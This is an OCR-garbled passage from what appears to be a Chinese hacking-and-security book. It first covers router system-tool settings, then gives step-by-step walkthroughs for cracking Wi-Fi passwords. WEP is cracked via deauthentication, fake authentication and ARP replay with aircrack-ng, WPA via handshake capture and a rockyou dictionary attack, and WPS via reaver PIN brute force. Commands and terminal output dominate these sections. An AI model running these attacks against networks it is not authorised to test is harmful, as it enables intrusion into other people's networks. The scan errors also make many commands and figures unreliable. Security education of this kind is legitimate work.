路 由 表 ” 设 置 界面 ， 在 其 中 可 以 设置 路 由 
器 的 静态 路 由 信息 ， 如 下 图 所 示 。 


本 页 设置 路 由 器 的 更 恋 路 由 信息 。 

加 目的 了 缩 地 址 了 网 撞 码 网 关 状态 编辑 
添加 新 条 目 】 [ 俩 所 有 亲 舍 生 芍 ] [使 所 有 东 且 和 失 苑 ] [ 删 取 所 有 条 目 

EE 本 [| [故而 


绝招 5: 路 由 器 系统 工具 的 设置 


路 由 器 的 系统 工具 主要 用 于 路 由 器 的 齐 
控制 管理 ， 其 中 包括 时 间 设置 、 诊 断 工 具 、 
软件 升级 、 恢 复出 厂 设置 、 备 份 和 载 入 配 
置 、 重 启 路 由 器 、 修 改 登录 口令 、 系 统 日 志 、 
流量 统计 等 功能 ， 如 下 图 所 示 。 


诊断 工具 
软件 升级 
恢复 出 厂 设置 
备份 和 载 入 配置 
重启 路 由 器 


修改 登录 口令 


进入 路 由 器 系统 工具 设置 的 操作 步骤 
如 下 。 
[Sep 在 政 由 器 功能 列表 中 选择 “系统 工具 ” 
选项 下 的 “时 间 设 置 ” 选 项 , 进入 “时 间 设置 ” 
界面 ， 在 其 中 可 以 设置 路 由 器 的 系统 时 
间 ， 用 户 还 可 以 选择 自己 设置 时 间或 者 从 
互联 网 上 获取 标准 的 GMT 时 间 ， 如 下 图 
所 示 。 
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本 页 设置 路 由 器 的 系统 时 间 ， 您 可 以 选择 自己 设置 时 间或 者 从 互联 网 上 获取 标 


注意 : 关闭 路 由 器 电源 后 ， 时 间 信息 会 于 失 ， 当 您 下 次 开机 连 上 Internet 后 ， 
路 由 器 将 会 自动 获取 9 时 间 。 您 必须 先 连 上 Internet 获 取 GI 时 间或 到 此 页 设 
加 时 间 后 ， 其 他 功能 中 的 时 间 限定 才能 生效 。 


时 区 : (GMT+ 08.00) 北京 ， 重 庆 ， 乌 答 木 齐 , 香江 特别 行政 区 , 台北 "| 


日 期 : [2006 ”| 年 [1 月 [ 日 

时 间 : [9 时 [27 分 [5 秒 

优先 使 用 机 ?服务 器 ! 0000 

优先 使 用 FTP 服 务 器 2 0000 

就 取 GMT 间 | ( 仅 在 连 上 互联 了 后 才能 获取 ga 时 间 ) 
保存 ] [ 才 助 


侈 注意 : 关闭 路 由 器 电源 后 ， 时 间 信息 
会 丢失 ， 当 下 次 开机 连 上 Intemet 后 ， 路 
由 器 将 会 自动 获取 GMT 时 间 。 必 须 先 
连 上 Internet 获取 GMT 时 间或 到 此 页 设 
置 时 间 后 ， 其 他 功能 中 的 时 间 限 定 才能 
生效 。 


[Eee 图 选择 “诊断 工具 ”选项 ,进入 “诊断 工具 ” 
界面 ， 在 其 中 可 以 使 用 Ping 或 者 Tracert， 
诊断 路 由 器 的 连接 状态 ， 如 下 图 所 示 。 


荐 数 设 置 

选择 操作 : Oping 
IP 地 址 /域名 : 
Ping 世 执 目 : [4 
ping 也 大 小 : [64 
Ping 超时 : 800 
Tracert 跳 数 ; |20 


Tracert 


(1-50) 
《4-1472 字 节 ) 


开始 | | 帮助 


[step 图 选择 “软件 升级 ”选项 ， 进 入 “软件 
升级 ”界面 ， 在 其 中 可 以 通过 官方 发 布 软 
件 版 本 ， 对 现 有 路 由 器 进行 软件 升级 ， 如 
下 图 所 示 。 


230 


软件 升 名 


通过 升级 本 路 由 芍 的 软件 ， 您 插 获得 新 的 功能 < 


文件 名 : Wr845nv2-cn-up bin 

TEIP 服务 器 IP: [192.158.1100 

当前 软件 版 本 : 。 4.19.18 Build 130123 Rel.32879n 
当前 硬件 版 本 : 。 YE845N 2 .0 00000000 


注意 : 请 使 用 有 线 LAN 口 连接 进行 次 件 升级 * 升 织 时 请 选择 与 当前 硬件 版 本 
一 至 的 软件 。 升 级 过 程 不 能 关闭 路 由 器 电源 ， 否 风 桂 导致 路 由 器 损坏 而 无 法 
使 用 * 升 所 过 程 约 40 秒 ， 当 升 名 结束 后 ， 路 由 器 将 会 自动 重新 启动 * 


国 EE 


人 移 注 意 : 使 用 有 线 LAN 口 连接 进行 软件 升 
级 。 升 级 时 请 选择 与 当前 硬件 版 本 一 致 的 
软件 。 升 级 过 程 不 能 关闭 路 由 器 电源 ， 否 
则 将 导致 路 由 器 损坏 而 无 法 使 用 。 升 级 过 
程 约 40s， 当 升级 结束 后 ， 路 由 器 将 会 自动 
重新 启动 。 

[step 园 选择 “恢复 出 厂 设置 ”选项 ， 进 入 
“恢复 出 厂 设置 ”界面 ， 在 其 中 如 果 单 击 
“恢复 出 厂 设置 ”按钮 ， 可 以 将 路 由 器 的 
所 有 设置 恢复 到 出 厂 时 的 默认 状态 ， 如 下 
图 所 示 。 


rr 
单 击 此 按钮 稳 使 路 由 器 的 所 有 设置 收复 到 出 厂 时 38 认 状态 。 
恢复 出 三 设置 
才 助 


选择 “备份 和 载 入 配置 文件 ”选项 ， 
进入 “备份 和 载 入 配置 文件 ”界面 ， 在 其 
中 可 以 保存 当前 路 由 器 的 设置 。 建 议 在 修 
改 配置 及 升级 软件 前 备份 当前 的 配置 文件 ， 
当然 也 可 以 通过 选择 备份 文件 恢复 之 前 的 
配置 ， 如 下 图 所 示 。 


您 可 以 在 这 保存 您 的 设置 。 我 们 建议 您 在 修 隐 配置 及 升级 软件 前 备份 多 938 
置 文件 * 


备份 配置 文件 
您 可 以 通过 载 入 配置 文件 未 恢复 您 的 设置 。 

路 径 : [选择 文件 | 未 选择 任何 文件 载 入 配置 文件 
注意 : ”1、 导 入 配置 文件 后 ， 设 备 中 原 有 的 用 户 配置 持 会 丢失 。 如 果 您 载 


2 、 载 和 本 和 文件 的 这 程 不 能 关闭 路 由 关 电 源 ， 否则 将 号 到 路 由 备 
损 而 无 去 使 用 。 吉 入 计 程 约 20 秒 ， 当 载 和 结束 后 ， 路 由 加 将 会 自 
动 新 启动 。 


step 国 选择 “重启 路 由 器 ”选项 ， 进 入 “ 重 
启 路 由 器 ”界面 , 在 其 中 单 击 “ 重 启 路 由 器 ” 
按钮 ， 可 以 重新 启动 路 由 器 ， 如 下 图 所 示 。 


重启 2 由 器 

单 击 此 按 包 将 使 路 由 器 重新 启动 
重启 路 由 器 
EI | 
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个 所 时 以 及 旭 站 10 守 针 站 的 才 所 过 重 示 行 了 统计 <。 


[step 国 选择 “修改 登录 口令 ”选项 ,进入 “ 修 
改 登录 口令 ”界面 ， 在 其 中 可 以 修改 系 
统管 理 员 的 用 户 名 与 口令 ， 建 议 配 置 完 
路 由 器 后 重新 设置 管理 员 的 账号 密码 ， 
防止 黑客 使 用 弱 口 令 登 录 路 由 器 ， 如 下 
图 所 示 。 


本 页 修改 系统 管理 员 的 用 户 名 及 口令 ， 用 户 名 及 口令 长 度 不 能 超过 14 个 字 
节 。 


国 53 国 EE | 


[ep 园 选择 “系统 日 志 ” 选 项 ， 进 入 “系统 
上 日志” 界面 ， 在 其 中 可 以 查看 系统 日 志 ， 
其 中 包括 管理 员 登 录 信 息 ， 路 由 器 健康 状 
态 等 ， 如 果 路 由 器 被 非法 修改 ， 可 以 通过 
日 志 查 看 进行 排除 ， 如 下 图 所 示 。 

ss | 


[step 图 选择 “流量 统计 ”选项 ， 进 入 “流量 
统计 ”界面 ， 在 其 中 可 以 分 别 对 路 由 器 总 
的 数据 流量 以 及 最 近 10s 内 的 数据 流量 进行 
统计 。 默 认 情 况 是 关闭 的 ， 如 有 需要 可 以 
打开 ， 在 网 络 遭 受 攻击 时 ， 通 过 数据 流量 
分 析 对 找 出 攻击 主机 也 是 非常 有 帮助 的 ， 
如 下 图 所 示 。 


当 亲 这 拉杆 ; Bx 
0 [107] 纱 
EE TL 3 |] a EE 
本 EE Ee 
ET Er ES I ES EN ET 


当前 纺 计 者 握 为 空 


er EJ 3 亲 [EJ 页 硫 同 


无 线路 由 器 的 密码 破解 


无 线路 由 器 密码 的 安全 强度 是 进入 无 
线 网 络 的 关键 ， 要 想 从 无 线路 由 器 进入 内 
网 ， 就 必须 要 知道 无 线路 由 器 的 密码 ， 使 
用 一 些 破解 工具 可 以 破解 出 无 线路 由 器 的 
密码 ， 下 面 介绍 在 Linux 系统 下 使 用 工具 破 
解 无 线路 由 器 密码 的 方法 。 


绝招 6: 破解 无 线路 由 器 的 WEP 密 码 


使 用 aircrack-ng 工具 可 以 破解 WEP 加 此 
密 方 式 的 无 线路 由 器 密码 。 破 解 之 前 ， 首 
先 登 录 无 线路 由 器 ， 将 无 线路 由 器 的 加 密 
方式 设置 成 WEP 加 密 ， 如 下 图 所 示 ， 修 改 


13.2 


a 


加 密 方式 后 需 重启 路 由 器 才能 生效 。 

i EE 

WEP 密 钥 格式 : ASCI 现 

密 家 选择 YE? 密 旬 密 钥 类 型 

密 钥 1: 1234567890123 126 位 v 

密 角 2: 禁用 _v 

密 钥 3: Ej 

密 钥 4: Ej 
破解 WEP 密码 的 具体 操作 步骤 如 下 。 


执行 airmon-ng strat wlan0 命令 ， 启 
动 网 卡 并 进入 monitor 模式 ， 执 行 结果 如 下 
图 所 示 。 


rearekati:-e airmon-ng start vtang 


phyljwtanamon) 


rode vif enabled for [phy1] 
wmode vif disabled for lphy 


[step 图 执行 “airodump-ng -c < 信道 > --bssid 
<AP-MAC 地 址 >-w< 保 存 文件 名 > 
wlan0mon” 命 令 ， 启 动 数据 抓 包 功 能 ， 并 
保存 抓 取 后 的 文件 ， 如 下 图 所 示 。 
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CH 1 JU ELapsed: 6 s ][ 2018-10-18 04:88 


BssID PuR RXQ Beacons #0ata, #/s CH MB ENC CIPHER AUTH ESSID 


CHFA:6B8:01:2F:08 -8 4 25 3 日 1 She. WEP WEP Test-ee1 


BssID STATION Pm Rate Lost Franes probe 


IcsFA:GB:01:2F:08 DC:6D:CD:66:FE:CB -12 


ep 图 如 果 AP 与 STA 有 关联 ， 可 以 使 用 
“arieplay-ng -0 1 -a <AP-MAC 地址 >-c 
< 已 连接 STA-MAC 地 址 > wlan0mon ”命令 ， 
执行 该 命令 后 ， 会 解除 AP 与 STA 的 关联 ， 
如 下 图 所 示 。 


rootekali:-# aireplay-ng -0 : 
co fron (SerD: 
84:15:97 Sending 64 directed DeAuth (code 


step 园 此 时 会 抓 取 到 AP 与 STA 关联 时 的 密 
铀 流 ， 抓 取 的 密 钥 流 如 下 图 所 示 。 


Ch 1 I Elapsed: 3 ni 


-se ©. 


ns 1 2019-10-18 04:12 1 148 bytes heystrean: 1C:FA:68:01:2F:08 


B55ID PR RO beacons #0ata, #/s CH Ma ENC CIPHER AUTH ESSID 
HCFASGB:01:2F:08 0 5 986 164 4 1 Ste. WEp WEp SKA Test-001 
ssID STATION PR Rate Lost Franes Probe 


CHFA:68:01:2F:08 DC:6D:CD:66:FE:CB -14 


step 图 执行 ls 命令， 查看 当前 目录 可 以 发 现 
有 一 个 扩展 名 为 .xor 的 文件 ， 这 个 文件 保 
存 着 STA 关联 AP 的 密 钥 流 ， 如 下 图 所 示 。 

root@kali:~# 15 


Downtoads Templates wep-91.csv 
Music wep-01.kisnet.csv 


利用 XOR 文件 与 AP 建立 关联 ， 一 
旦 获取 到 密 钥 流 便 可 以 将 任意 主机 与 AP 进 
行 关联 ， 使 用 “aireplay-ng -1 < 间隔 时 间 > 
-e <ESSID> -y < 密 钥 流 文件 > -a <AP-MAC 
地 址 > -h< 需 要 建立 关联 的 MAC 地 址 > 
wlan0mon” 命 令 ， 可 以 使 本 机 与 AP 建立 
关联 ， 如 下 图 所 示 。 


和 Le Test-881 -y wep-81-1C-FA-68-91-2F-88. 
EuiSnB 
[oSi31 Walting for bedcon trane ESsrp。 1c:FA:60:01:2r:00) on chaanet 1 


-9 22 i159 


04:3s:31 Sending Authentication Request (shared Key) [ACK] 
35:31 Authentication 1/2 successtul 
(04:35:31 Sending encrypted challenge. 

04:35:31 Authentication 2/2 successful 


(04:35:31 Association suc 


[step 国 执行 ARP 重 放 收 集 IV 数据 ， 执 行 
ARP 重 放 需 要 先 获取 一 个 有 效 ARP 数据 ， 
本 机 只 是 与 AP 建立 了 关联 ， 并 不 能 进行 通 
信 ， 所 以 还 需要 抓 取 一 个 有 效 ARP 通信 ， 
此 时 可 以 执行 “aireplay-ng -3 -b <AP-MAC 
地 址 >-h< 本 机 MAC 地 址 > wlan0mon? 
命令 ， 如 下 图 所 示 。 


eh renlay nb Er iat sh Ree pn nah abe 
39:49 Waiting for beacon frane (BSSID: 1C-FA:68:91:2F:08) on channel 
Saving ARP requests in replay arp-1018-843949.cap 
You should also start airodunp-ng to capture replie 
ad 1404 packets (gor 6 ARP Tequests and 9 ACKS), Snt © packets...(8 pps) 
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or -3 AC:FA:68: 


step 图 再 次 接触 AP 与 STA 关联 ， 触 发 真实 
的 ARP 数据 包 ， 产 生 以 replay arp 开头 的 
文件 ， 如 下 图 所 示 。 


enyarp- 918-0l337 .cap vep-01. cop 
wep-01.csY 
Ol.klsmet, 


tt 


Teptay arp-1019-012760.¢ 
2-1818-913325 .cap wep -01-1c-FA-68-01-2F-08.xor 


sg 当 产 生 这 个 ARP 合法 数据 包 后 ， 便 
全 和 的 AR 生生 如 下 图 所 示 。 


1C:FA:68:01:2F:08 -h EB-4E-96-28-AE-46 wlanonon 
ng or beacon rane WessiD} :rhs60:01:27:08) on channel 1 
oodor arp- Nl-ette22 


nould 
ese dase us ad So6 Kexs), 


[ep 贺 尽量 多 地 收集 ITV， 收集 的 IV 值 越 多 
越 容易 破解 出 密码 ， 如 下 图 所 示 。 


eH 1 I Elapsed: 34 nins 1 2918-19-18 92:67 J| 148 bytes keystrean: 1C:FA:68:01:2F:09 


ent 4252 packets .1499 pps) 


Bss1D PR Rx9 Beacons aData, #/s CH Ma ENC CIPHER AUTH E55ID 


CFAG0:O1:2F:08 © 54 12390 144526 @ 1 Sse, WEP WEP SKA Test-691 


B551D STATION PR Rate Lost Franes Probe 


HEA:GON:D1:2F:08 E8;4E:96:28:hAE:46 0 0-1 
1C:FA:68:91:2F:68 DC:6D:CD:66:FE:CB -2 1e- 6 


使 用 aircrack-ng 工具 破解 密码 ， 该 
密 为 KEY FOUND1!，KEY FOUNDI! 后 
面 方 括号 中 是 密码 的 十 六 进 制 形式 ， 后 面 
“ASCII: ”后 面 便 是 常用 的 字符 串 密 码 ， 
如 下 图 所 示 。 


Alrcrack-ng 1.4 


0 
3194 Test-001 


I00:90:66] Tested S11 keys (got 142792 IVs) 


epth bytetyote 


‘a 
a 7 5D(157449) 28(155648) 56(155392) 0C(154369) BE(154112) 
1 2 1 9700130088) ED/136928) 33(130873) Dal136316) 76(153136) 
2 @/ 1 96(199168) 27(158976) 92(158976) 7C(157696) B1(157184) 
3 59/ 3 F6(147456) 20(146944) 3E(146944) 651146944) 881146944) 
4 2/ 5 A5(168989) 58(159488) C4(158976) 3C1156416) 94(155648) 
ey FO! { 31:32:33+34:35:36:37+39+39:30:31:32:33 】 (ASCH1: 1234567890123 


Decrypted correctly: 


侈 提示 : 一 旦 收集 到 足够 多 的 IV， 那 么 破 
解 WEP 密码 的 速度 就 非常 快 ， 所 以 采用 
WEP 加 密 是 不 安全 的 。 


绝招 7: 破解 无 线路 由 器 的 WPA 密 码 要 


破解 WPA 与 WEP 不 同 ，WEP 需要 收 足 强 和 


集 大 量 IV 数据 ， 而 WPA 只 需要 抓 取 4 次 
握手 信息 即 可 ， 但 是 如 果 字 典 文件 中 没有 
密码 是 破解 不 出 来 的 。 


认识 字典 文件 


Kali 中 本 身 自 带 了 一 些 字典 文件 ， 查 
看 自 带 字典 文件 的 方法 如 下 。 

(1) /user/share/john 目录 下 的 password. 
lst 字典 文件 ， 如 下 图 所 示 。 


root@kali: /usr/share/john# ls 


alnum. chr dumb16. conf korelogic. conf 
alnumspace.chr dumb32.conf Tanman. chr 
alpha.chr dynamic. conf Tatin1.chr 
ascii.chr dynamic flat sse formats.conf lm ascii.chr 
cronjob john.conf Tower.chr 
digits.chr john. local .conf Towernum. chr 


(2) /usr/share/wfuzz/wordlist/general 目 
录 下 的 字典 文件 ， 如 下 图 所 示 。 


root@kali: 
总 用 量 488K 

drwxr-xr-x 2 root root 4.9K 
drwxr-xr-x 8 root root 4.0K 


-rw-r--r-- 1 root root 2.5K 
-rw-r- 1 root root 22K 
-rwr--r- 1 root root 1.2K 
-rw-r--r-- 1 root root 6.4K 
-rw-r--r-- 1 root root 278 
mr 1 root root 141 
-rw-r--r-- 1 root root 238 
-rw-r--r-- 1 root root 12K 
-rw-r--r-- 1 root root 491K 
-rw-r--r-- 1 root root 244 
-rw-r--r-- 1 root root 2.1K 
-rw-r--r-- 1 root root 79 


usr/share/wfuzz/wordlist/general# 15 -lah 


admin-panels. txt 
big. txt 

catala. txt 
comnon. txt 

euskera. txt 
extensions_comnon.txt 
http_methods. txt 
medium. txt 
megabeast. txt 
mutations_commcn .txt 
Spanlsn .TXT 

test. txt 


(3) /usr/share/wfuzz/wordlist/Injections 


目录 下 的 字典 文件 ， 如 下 


root@kali: /usr/share/wfuzz/wordlist 


总 用 量 46K 

Idrwxr-xr-x 2 root root 4.9K 16 月 8 
ldrwxr-xr-x 8 root root 4.9K 8 月 21 
-rw-r--r-- 1 root root 11K 3 月 25 
-rw-r--r-- 1 root root 59 3 月 25 
-rw-r--r-- 1 root root 1.6K 3 月 25 
-rw-r--r-- 1 root root 3.4K 3 月 25 
-rw-r--r-- 1 root root 1.5K 3 月 25 
-rw-r--r-- 1 root root 2.4K 3 月 25 


Injections# 15 -Lah 


99:58 

06:52 

2018 All attack.txt 
2918 bad chars.txt 
2918 SQL.txt 

2918 Traversal.txt 
2918 XML .txt 

2018 XSS.txt 


(4) /usr/share/wfuzz/wordlist/others 目 
录 下 的 字典 文件 ， 如 下 图 所 示 。 


root@kali: /usr/share/wfuzz/wordlist/others# ls -lah 


总 用 量 72K 

drwxr-xr-x 2 root root 4.9K 16 月 8 96:58 

drwxr-xr-x 8 root root 4.9K 8 月 21 96:52 

-rw-r--r-- 1 root root 418 3 月 25 2018 common pass.txt 
-rw-r--r-- 1 root root 59K 3 月 25 2018 names.txt 


(5) /usr/share/wfuzz/wordlist/stress 目录 
下 的 字典 文件 ， 如 下 图 所 示 。 


root@kali: 
总 用 量 184K， 


usr/share/wfuzz/wordlist/stres: 


s# ls -lah 


drwxr-xr-x 2 root root 4.9K 16 月 8 99:58 
drwxr-xr-x 8 root root 4.9K 8 月 21 06:52 


-rw-r--r-- 1 root root 189 3 月 25 
-rw-r--r-- 1 root root 124 3 月 25 2918 
-rw-r--r-- 1 root root 52 3 月 25 
-rw-r--r-- 1 root root 1.5K 3 月 25 
-rw-r--r-- 1 root root 155K 3 月 25 

1 root root 1.9K 3 月 25 


-rw rr 


2618 alphanum case extra.txt 


alphanum case. txt 


2918 char.txt 
2918 doble uri hex.txt 
2918 test ext.txt 
2018 uri hex.txt 


(6) /usr/share/wfuzz/wordlist/webservices 


目录 下 的 字典 文件 ， 如 下 图 


root@kal. 
总 用 量 16K 

drwxr-xr-x 2 root root 4.6K 16 月 8 
drwxr-xr-x 8 root root 4.6K 8 月 21 
root root 453 3 月 25 
root root 1113 月 25 


usr/share/wfuzz/wordlist, 


所 示 。 


/webservices# ls -lah 


8| 
86:52 . 

2618 ws-dirs.txt 
2618 ws-fites .txt 


(7) /usr/share/wfuzz/wordlist/vulns 目录 
下 的 字典 文件 ， 如 下 图 所 示 。 
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root@kal: 
总 用 量 449K 

drwxr-xr-x 2 root root 4.6K 16 月 8 99:58 - 

drwxr-xr-x 8 root root 4.6K 8 月 21 96:52 

-mw-r root root 239 3 月 25 2618 apache.txt 

root root 198K 3 月 25 2618 cgis .txt 

root root 766 3 月 25 2618 coldfusion.txt 

root root 74K 3 月 25 2618 dirTraversal-nix.txt 
root root 71K 3 月 25 2618 dirTraversal.txt 
root root 72K 3 月 25 2618 dirTraversal-win.txt 
root root 3.1K 3 月 25 2618 domino.txt 

root root 15K 3 月 25 2618 fatwire pagenames.txt 
root root 863 3 月 25 2618 fatwire.txt 

root root 383 3 月 25 2618 frontpage.txt 

root root qt 3 z2 zela 115.TXT 

root root 365 3 月 25 2618 iplanet.txt 

root root 366 3 月 25 2618 jrun,txt 

root root 155 3 月 25 2618 netware.txt 

root root 295 3 月 25 2618 oracte9i.txt 

root root 16K 3 月 25 2618 sharepoint.txt 

root root 571 3 月 25 2618 sql inj.txt 

root root 976 3 月 25 2618 sunas.txt 

root root 229 3 月 25 2618 tests.txt 

root root 1.8K 3 月 25 2618 tomcat.txt 

root root 536 3 月 25 2618 vignette.txt 

root root 2-4K 3 月 25 2618 weblogic.txt 

root root 7.4K 3 月 25 2618 websphere.txt 


(8) /usr/share/wordlist 目录 下 的 字典 文 
件 ， 如 下 图 所 示 。 


root@kali: /usr/share/wordlists# ls -Lah 


usr/share/wfuzz/wordlist/vulns# ls -Lah 


aa3aaaaaaaaaaaaaaaaaaaa 


Prrrrrrrrrrrrrrrrrrrrrn 


总 用 量 51M 

drwxr-xr-x 2 root root 4.6k 8 月 21 66:52 . 

drwxr-xr-x 449 root root 16K 16 月 13 64:59 .. 

trwxrwxrwx 1 root root 25 8 月 21 66:52 dirb 
Lrvwxrwxrwx 1 root root 39 8 月 21 66:52 dirbuster 
Lrwxrwxrwx 1 root root 35 8 月 21 66:52 dnsmap.txt 
Lrwxrwxrwx 1 root root 41 8 月 21 06:52 fasttrack.txt 
lrwxrwxrwx 1 root root 45 8 月 21 06:52 fern-wifi 
Lrvxrwxrwx 1 root root 45 8 月 21 66:52 metasploit 
Lrwxrwxrwx 1 root root 41 8 月 21 66:52 nmap.Lst 
-rw-r--r-- 1 root root 51H 3 月 3 2913 rockyou.txt.gz 
1Lrvxrwxrwx 1 root root 34 8 月 21 66:52 sqlmap.txt 
Lrwxrwxrwx 1 root root 25 8 月 21 66:52 wfuzz 


(9) wordlist 目录 中 有 一 个 压缩 文件 
rockyou.txt.gz， 其 中 也 包含 一 个 字典 文件 解 
压缩 ， 如 下 图 所 示 。 


root@kali: /usr/share/wordlists# gunzip rockyou.txt.gz 
root@kali:/usr/share/wordlists# LS 

dirb dnsmap. txt fern-wifi nmap.lst sqlmap.txt 
dirbuster fasttrack.txt metasploit rockyou.txt wfuzz 
root@kali: /usr/share/wordlists# cat rockyou.txt | wc -1 
14344392 


2. 破解 WPA 密 码 


破解 文件 之 前 ， 需 要 设置 无 线路 由 器 
的 加 密 方式 。 设 置 方法 为 : 首先 登录 无 线 
路 由 器 ， 在 将 无 线路 由 器 的 加 密 方式 设置 
成 WPA 加 密 ， 如 下 图 所 示 ， 修 改 加 密 方式 
后 需 重启 路 由 器 才能 生效 。 


国 YPA-PSK/MPA2-PSK 


认证 类 型 : 自动 9 
加 这 算法 : 自动 
PSE 密码: Password 
(9-63 个 ASCII 码 字符 或 8-64 个 十 六 进 制 字 符 》 
el 36400 


《单位 为 秒 ， 最 小 值 为 30， 不 更 新 风 为 0) 


破解 WPA 密码 的 具体 操作 步骤 如 下 。 


233 


SS 黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


step 国 使 用 airmon-ng strat wlan0 命令 ， 启 
动 网 卡 并 进入 monitor 模式 ， 如 下 图 所 示 。 


Phy Interface Driver chipset 


phyl wlane rt2s00usb Ralink Technology, corp. RT2870/RT3079 


(macaezll nonitor node vif enabled for phyl]wlang on [phyllwlanonon) 
(macae21l station node vif disabled for [phyajwtane) 


[step 加 使 用 “airodump-ng -c < 信道 > 
--bssid <AP-MAC 地 址 > -w < 保存 文件 名 > 
wlan0mon” 命 令 ， 启 动 数据 抓 包 功 能 ， 并 
保存 抓 取 后 的 文件 ， 如 下 图 所 示 。 


CN at Elapsed; 1 nin 1 2019-10-18 23:27 


BassI0 PR RXO Beacons #0ata, #/s CH Me ENC CIPHER AUTH ESSID 
HtFA:SB:012F:08 1 53 459 16 © 1 278 WpAz com PsK Test-e0l 
5sID STATION PR mate Lost Franes probe 
ciFA:68:81:2F:98 pbC:6DicD:66:FE:C 1 9 -6 1 a 


如 果 AP 与 STA 有 关联 ， 可 以 使 用 
“arieplay-ng -0 1 -a <AP-MAC 地 址 >-c 
< 已 连接 STA-MAC 地 址 > wlan0mon” 命 令 ， 
执行 该 命令 后 ,会 解除 AP 与 STA 的 关联 ， 
如 下 图 所 示 。 


roergkati;-h aireptay-ng -0 1 -a lc:FAi6a:glt2F:98 -c DC:6D:CDi66:FE:CB wanepon 
04115:06 © Walting for beacon frame (BSSID: 1C:FA:6891:2F:09) on channet 1 
O4115:07 Sending 64 directed DeAuth (code 7), STHAC: [OC:60:CD:66:FE:CB] | ©)55 ACKsl 


当 抓 取 到 AP 与 STA 关联 时 的 4 次 握 
手 如 下 图 所 示 ， 会 给 出 相应 的 提示 
信息 。 


CH TI Elapsed: 3 mins 1[ 2018-10-18 23:30 J{ WPA handshake: 1C:FA:68:01:2F:08 


ssT0 PR RxO aoacons #0ata, #/s CH HS ENC CIpHER AUTH ESSTD 


1c:Fhi68:9l:2f;09 1 39 il 83 2 1 270 WA cmp psK Test-001 


5510 STATION PuR Nate Lost Franes Probe 


CIFA6B8:01:2F:08 DC:00:CD:06:FE:CB 0 


[step 较 使 用 “aircrack-ng -w < 字典 文件 > 
wpa-01.cap” 命 令 ， 即 可 破解 出 WPA 密码 ， 
如 下 图 所 示 ， 可 以 看 到 每 秒 筛选 2174 个 密 
码 文件 。 如 果 字 典 中 存在 密码 文件 ， 一 定 会 
破解 出 来 ， 这 里 获取 的 密码 为 Password。 


[ee:08:99] 172/647 keys tested (2174.95 k/s 


le- ee 1912 92 Test-001 


Time left; 6 seconds 26.58s 


KEY FOUND! [ Password ] 


Master Key : 82 94 JA F8 6C 35 F6 53 DD OF 7F 96 4A 46 17 AB 


D1 43 4A 74 D1 42 39 99 66 26 69 5C D5 B87 BD 17 
Transient Key : 51 FB B2 7C FA 7B 1F 8D E5 B4 47 12 EQ 6B 6A 68 
46 69 45 F9 EQ 15 1B EA 45 34 D3 D2 E9 6F DC 2E 
FB 9A FE 82 56 92 77 D5 F1 94 89 99 60 99 69 90 
90 99 60 99 60 99 00 99 00 99 09 99 09 99 00 90 


EAPDL HMAC : 3E 7B E2 FA C6 9D 53 78 Fe 95 8F F7 EC 7C 7B A2 


绝招 8: 破解 无 线路 由 器 的 WPS 密 码 
Reaver 工具 是 目前 流行 的 无 线 网 络 攻 


击 工具 ， 它 主要 针对 的 是 WPS 漏洞 。Reav- 
er 工具 会 对 WiFi 保护 设置 (WPS) 的 注册 
PIN 码 进 行 暴力 破解 攻击 ， 并 尝试 恢复 出 
WPA/WPA2 密码 。 

使 用 Reaver 工具 破解 密码 的 具体 操作 
步骤 如 下 。 
[see 加 使 用 reaver 命 令 ， 查 看 Reaver 工具 
的 帮助 信息 ， 所 需 参 数 如 下 图 所 示 。 


Iroot@kali: -# reaver 


Reaver v1.6.5 WiFi Protected Setup Attack Tool 
[copyright (c) 2811, Tactical Network Solutions 


Requlred Argunents 
face=<wlan> Name of the nonitor-mode interface to use 
BSSID of the target AP 


将 网 卡 设置 成 monitor 模 式 ， 寻 找 支持 
WPS 的 AP， 使 用 “wash -U -i wlan0mon” 

命令 ， 执 行 结果 如 下 图 所 示 ， 其 中 -U 表 示 
以 UTF-8 字 符 编码 进行 显示 ，-i 是 具体 使 用 
的 网 卡 接 口 。 


rootékall:-# wash -U -1 wlanenon 


BSSID Ch dBm WPS Lek Vendor ESSID 
42:31:3C:E1:D8:69 9 -59 2.9 No RalinkTe 小米 共享 WiFi D968 
04:95:E6:12:CA:21 11 -57 2.9 No Broadcon Chinanet-KTIK9F 
AC:A2:13:85:FC:C9 4 -59 2.9 No RalinkTe lfwx 
AB:57:4E:CI:FB:74 11 -57 2.0 No Unknown wongyancyang 
28:2C:B2:EA:D5:54 11 -61 2.0 No Unknown TP-LINK_EAD554 
48:A5:EF:67:85:A2 1 -59 2.0 No 主 接 83-1 
DC:C6:48:C1:B3:SC 8 -61 1.9 No Ralinkre Chinaet-Tkae 
38:E2:DD:74:AlL:AA 4 -61 2.9 No RalinkTe ChinaNet-nkkk 


侈 提示 : 可 以 使 用 airodump-ng 工具 来 寻 
找 支 持 WPS 的 AP， 使 用 airodump-ng-wps 
wlan0mon 命令 ， 同 样 可 以 寻找 到 支持 WPS 
功能 的 AP， 执 行 结 果 如 下 图 所 示 。 


rootohall: -9 atrodump-ng -wps wianonon 


cm 5 J{ Elapsed: 30 s J 2110-10-20 00:55 


Bss10 Poh Beacens soata, 4/s CH Mo ENC CIPHER AUTH WPS ESSID 
6:83:C0:33:60:73 -9 53 0 0 6 pw TPuest 6073 
F483:CD:33:60:73 28 37 8 日 WPpA2 cchp psK 于 接 
1C:FA:68:91:2F:68 -36 49 9 © 1 278 WA CCMP PSK 0.0 Test-00l 
4:68:A3: 7C:81:89 36 2 a a 6 54e WpA2CCMp MoT ~ CCC 
E4:68:A3:7C:81:82 36 3 8 @ 6 S4e OpN NCC 
E4268:A3: 7C:B1:8S 36 4 8 @ 6 Ste, OpN A 

E4268:A3: 7C:B1:8L 38 3 8 @ 6 Se, DPI and-Business 
E468:A3: 7C:EF FS 39 3 8 8 1 54e OPN .A 
8368:A3:7C:EF:F2 -48 2 PN CRCC-X 


[step 图 破解 pm 码 ， 使 用 “reaver -i wlan0mon 
-b<AP-MAC 地 址 >-vv-c32” 命令 ， 其 中 -vv 
显示 详细 信息 ，-c 选择 信道 ， 如 下 图 所 示 ， 
每 次 随机 选择 一 个 pin 码 进行 发 送 。 

[+] Associated with 1C:FA:68:81:FB:EA (ESSID: TP-LINK 81FBEA) 


[+] Sending WSC NACK 
[+] 0.05% conplete @ 2018-11-04 23:55:33 (28 seconds/pin) 


侈 提 示 : 在 破解 的 过 程 中 ， 如 果 加 入 及 1 
参数 ， 可 以 快速 破解 出 AP 的 PIN 码 。 


